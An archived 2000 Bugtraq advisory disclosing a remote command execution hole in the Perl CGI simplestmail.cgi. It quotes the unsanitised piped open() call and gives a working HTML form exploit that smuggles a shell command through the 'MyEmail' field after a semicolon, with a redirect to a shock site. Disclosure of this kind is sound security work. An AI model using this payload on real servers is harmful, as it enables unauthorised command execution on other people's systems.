Bugtraq mailing list archives
Insecure input validation in simplestmail.cgi (remote command execution)
From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 14:46:39 GMT
Hi Again, simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif Wright. It's available from: http://www.conservatives.net/atheist/scripts/index.html?simplestmail The code is self explanatory: ----code snippet---- $youremail = $contents_by_name{'MyEmail'}; open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n"; ----------------- Exploitation is straight forward: <html> <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST> Command: <input type=text name=MyEmail value=";"> <input type=hidden name=redirect value="http://goatse.cx"> <input type=submit name=submit value="run"> </form> </html> --rpc
Current thread:
- Insecure input validation in simplestmail.cgi (remote command execution) rpc (Dec 13)